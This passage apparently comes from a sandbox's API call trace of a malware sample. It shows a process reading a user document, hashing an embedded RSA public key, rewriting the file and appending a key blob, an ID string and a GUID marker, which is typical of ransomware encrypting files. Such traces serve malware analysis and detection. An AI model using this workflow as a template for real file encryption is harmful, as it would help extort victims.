nFileSizeLow=0x56f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m tTnqTecinKd5iUv7o.ots", cAlternateFileName="MTTNQT~1.OTS")) returned 1 [0193.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0c78 [0193.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0193.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.978] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\m tTnqTecinKd5iUv7o.ots") returned=".ots" [0193.978] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\m tTnqTecinKd5iUv7o.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\m ttnqtecinkd5iuv7o.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.979] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=22263) returned 1 [0193.979] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.981] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x56d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.981] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.984] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.984] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x56f7, lpOverlapped=0x0) returned 1 [0193.985] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.985] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.985] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.985] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.986] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.986] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.986] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.986] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.987] GetLastError () returned 0x0 [0193.987] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.987] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.987] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.987] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.987] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5700) returned 0x2ea79b0 [0193.988] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0c78 [0193.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657228 [0193.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0cc0 [0193.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0193.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0193.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0193.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.989] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea2a68 [0193.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x657270 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.992] GetCurrentThreadId () returned 0x66c [0193.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f920 [0193.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.993] GetCurrentThreadId () returned 0x66c [0193.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0193.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0193.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0193.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea1a80 [0193.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea1a98 [0193.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea1ab0 [0193.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea1ac8 [0193.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1ab0 | out: hHeap=0x620000) returned 1 [0193.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea1ab0 [0193.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a98 | out: hHeap=0x620000) returned 1 [0193.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea2a68 [0193.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1ac8 | out: hHeap=0x620000) returned 1 [0193.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea2c78 [0193.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0193.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea2e90 [0193.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0193.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e90 | out: hHeap=0x620000) returned 1 [0194.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1ab0 | out: hHeap=0x620000) returned 1 [0194.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a80 | out: hHeap=0x620000) returned 1 [0194.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0194.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0194.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0194.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0194.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0cc0 | out: hHeap=0x620000) returned 1 [0194.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0194.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0194.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.003] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x56f2, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x56f2, lpOverlapped=0x0) returned 1 [0194.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.004] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x56f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.004] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0194.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea2a68 [0194.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea2a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea2e98 [0194.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0194.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0194.005] WriteFile (in: hFile=0x568, lpBuffer=0x2ea2e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea2e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e98 | out: hHeap=0x620000) returned 1 [0194.006] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.006] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.006] CloseHandle (hObject=0x568) returned 1 [0194.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0194.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea2a68 [0194.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0194.008] 